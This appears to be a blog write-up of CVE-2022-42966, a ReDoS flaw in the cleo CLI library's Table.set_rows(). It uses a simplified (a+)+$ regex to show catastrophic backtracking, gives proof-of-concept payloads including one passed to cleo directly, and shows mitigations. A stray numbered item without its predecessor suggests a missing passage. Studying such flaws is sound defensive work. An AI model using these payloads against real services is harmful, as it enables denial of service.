On November 9, 2022, a security vulnerability was published under the identifier CVE-2022-42966. It affects the popular Python library cleo, specifically the way it processes rows for text-based tables. This post breaks down what happened, includes proof-of-concept code, and shows how a seemingly simple regex bug can lead to ReDoS (Regular Expression Denial of Service).
What is cleo?
cleo is a toolkit for building command-line interfaces in Python. Many Python projects, including poetry, use it for formatted output and user interaction.
One of cleo’s features is displaying tables in the CLI. To do that, the package includes the Table class, which lets you set rows to be displayed.
The Vulnerability
CVE-2022-42966 is an _exponential regular expression denial of service (ReDoS)_. The attack stems from the way the Table.set_rows() method uses a regular expression to process cell content. If an attacker can pass crafted, malicious input to this method, they can force the regex to take exponential time, resulting in a Denial of Service attack.
Let's Get Technical!
We’ll look at how Table.set_rows() uses a regex, see how the regex is vulnerable, and then craft an exploit.
Suppose cleo’s codebase contains something similar to this:
import re

def set_rows(self, rows):
    for row in rows:
        for cell in row:
            # Vulnerable regex!
            if re.match(r'(a+)+$', cell):
                # Process cell (for simplicity; real regex is more complex)
                pass
> Note: The actual vulnerable code and the regex are more complex, but r'(a+)+$' is a classic example of a regex vulnerable to ReDoS.
Why is This Regex Bad?
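When a pattern has nested quantifiers (like + inside +), regular expression engines that use backtracking can take a very long time on certain strings, especially ones that almost match but fail at the very end. Each failure sends the engine back to try another way of dividing the same characters between the inner and outer quantifier.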
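To make the cost concrete, here is a minimal sketch that counts how many ways a run of n 'a' characters can be divided into non-empty groups, which is roughly the search space a backtracking engine faces when (a+)+$ fails on the final character. The function name count_splits is illustrative, and the count is a model of the search space, not a measurement of any particular engine.

```python
from functools import lru_cache


@lru_cache(maxsize=None)
def count_splits(n: int) -> int:
    """Count the ways to split n consecutive 'a's into non-empty groups."""
    if n == 0:
        return 1  # nothing left to split: exactly one way to finish
    # Pick the size of the first group, then split whatever remains.
    return sum(count_splits(n - first) for first in range(1, n + 1))


for n in (5, 10, 20, 25):
    print(f"{n} characters -> {count_splits(n)} possible groupings")
```

The count doubles with every extra character (it equals 2 to the power n - 1), which is why a payload only a few characters longer can take far longer to reject.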
Let's write a simple Python script that exploits this, in a style similar to the real vulnerability:
import re
import time

# Copy of the type of vulnerable regex used
VULN_REGEX = r'(a+)+$'

# Malicious payload: a large number of 'a's, then a '!'
PAYLOAD = 'a' * 25 + '!'

start = time.perf_counter()
if re.match(VULN_REGEX, PAYLOAD):
    print("Match!")
else:
    print("No match.")
print(f"Time taken: {time.perf_counter() - start:.2f} seconds")
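For comparison, here is a small sketch that runs the toy pattern next to a rewritten one. In this toy case the outer group adds nothing, so a+$ accepts the same strings as (a+)+$ while leaving the engine only one way to consume the run of 'a's. The names SAFE_REGEX and timed_match are illustrative, and this says nothing about how cleo's real pattern was or should be changed.

```python
import re
import time

VULN_REGEX = re.compile(r'(a+)+$')  # nested quantifier: exponential backtracking
SAFE_REGEX = re.compile(r'a+$')     # same accepted strings, single quantifier


def timed_match(pattern, text):
    """Return (matched, seconds) for pattern.match(text)."""
    start = time.perf_counter()
    matched = pattern.match(text) is not None
    return matched, time.perf_counter() - start


# Kept shorter than the payload above so the vulnerable pattern finishes quickly.
payload = 'a' * 20 + '!'

for name, pattern in (("vulnerable", VULN_REGEX), ("rewritten", SAFE_REGEX)):
    matched, seconds = timed_match(pattern, payload)
    print(f"{name}: matched={matched}, {seconds:.4f}s")
```

Both patterns reject the payload; the difference is only in how long the rejection takes.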
Real-World Threat
An attacker can send such input wherever a cleo-powered CLI tool feeds untrusted input to set_rows(). For example:
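# Assumes Table is importable from cleo.helpers and takes no constructor
# arguments; check this against the cleo version you have installed.
from cleo.helpers import Table

# Simulating user input
rows = [
    ['a' * 30 + '!'],
    # other fake rows
]

table = Table()
# The dangerous call!
table.set_rows(rows)  # <-- This triggers the slow regex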
This means any CLI tool using cleo and passing user-controlled data to Table.set_rows() is at risk.
2. Never pass untrusted input to APIs that rely on regular expressions unless you are sure they are safe from catastrophic backtracking.
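When untrusted data has to reach such an API anyway, one defensive option is to bound the size of every cell first. The sketch below is an assumption-laden illustration: bounded_rows and MAX_CELL_LENGTH are hypothetical names, not part of cleo, and the limit of 16 is arbitrary. Capping length only bounds the worst-case work and does not repair a vulnerable pattern, so treat it as a stopgap alongside keeping the library updated.

```python
MAX_CELL_LENGTH = 16  # assumed limit for illustration; tune for your own data


def bounded_rows(rows, max_len=MAX_CELL_LENGTH):
    """Return a copy of rows with each cell coerced to str and truncated."""
    return [[str(cell)[:max_len] for cell in row] for row in rows]


# Hypothetical untrusted input: one oversized cell and one ordinary cell.
untrusted = [['a' * 30 + '!', 'ok']]
safe = bounded_rows(untrusted)
print(safe)
```

The truncated rows can then be handed to the table in place of the raw input.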
References
- NIST NVD: CVE-2022-42966
- Cleo GitHub Issue
- OWASP ReDoS Cheat Sheet
Conclusion
CVE-2022-42966 is a classic example of how even small regular expression mistakes can have big security consequences. Always audit the libraries you use, keep them updated, and be wary of regular expressions with nested quantifiers. ReDoS attacks are simple but powerful—and cleo is proof!
Timeline
Published on: 11/09/2022 20:15:00 UTC
Last modified on: 11/10/2022 14:28:00 UTC